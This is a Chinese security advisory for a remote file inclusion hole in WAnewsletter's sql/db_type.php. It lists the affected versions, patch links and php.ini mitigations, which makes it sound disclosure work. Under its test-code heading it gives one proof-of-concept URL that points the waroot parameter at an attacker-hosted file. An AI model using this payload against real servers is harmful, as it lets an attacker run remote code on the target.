WANewsletter DB_type.PHP远程文件包含漏洞

发布时间：2002-12-19
更新时间：2003-02-26
严重程度：高
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：6964

受影响系统

WAnewsletter WAnewsletter 2.0 .0
WAnewsletter WAnewsletter 2.0 Beta
WAnewsletter WAnewsletter 2.0.1
WAnewsletter WAnewsletter 2.0.2
WAnewsletter WAnewsletter 2.1 .0
WAnewsletter WAnewsletter 2.1 Beta2
WAnewsletter WAnewsletter 2.1 Beta1

详细描述
WAnewsletter存在漏洞可导致远程攻击者包含远程服务器上的文件。

WAnewsletter中'sql/db_type.php'脚本对$waroot变量缺少正确的处理，可导致攻击者提交恶意参数而指定参数为攻击者拥有的服务器上的文件，以WEB权限执行恶意文件中的代码。

测试代码
http://[target]/sql/db_type.php?waroot=http://[attacker]/

解决方案
补丁下载：

WAnewsletter 2.0beta:
http://www.phpsecure.org/index.php?id=66&zone=pDl

WAnewsletter 2.0.0:
http://www.phpsecure.org/index.php?id=67&zone=pDl

WAnewsletter 2.0.1:
http://www.phpsecure.org/index.php?id=68&zone=pDl

WAnewsletter 2.0.2:
http://www.phpsecure.org/index.php?id=69&zone=pDl

WAnewsletter 2.1beta:
http://www.phpsecure.org/index.php?id=70&zone=pDl

WAnewsletter 2.1beta 2:
http://www.phpsecure.org/index.php?id=71&zone=pDl

WAnewsletter 2.1.0:
http://www.phpsecure.org/index.php?id=72&zone=pDl

或设置Php.ini，设置'allow_url_fopen'和'register_globals'为'off'。

相关信息
Frog Man <leseulfrog@hotmail.com>
参考：http://www.securityfocus.com/archive/1/303980
相关主页：http://www.phpcodeur.net

最近严重漏洞

WANewsletter DB_type.PHP远程文件包含漏洞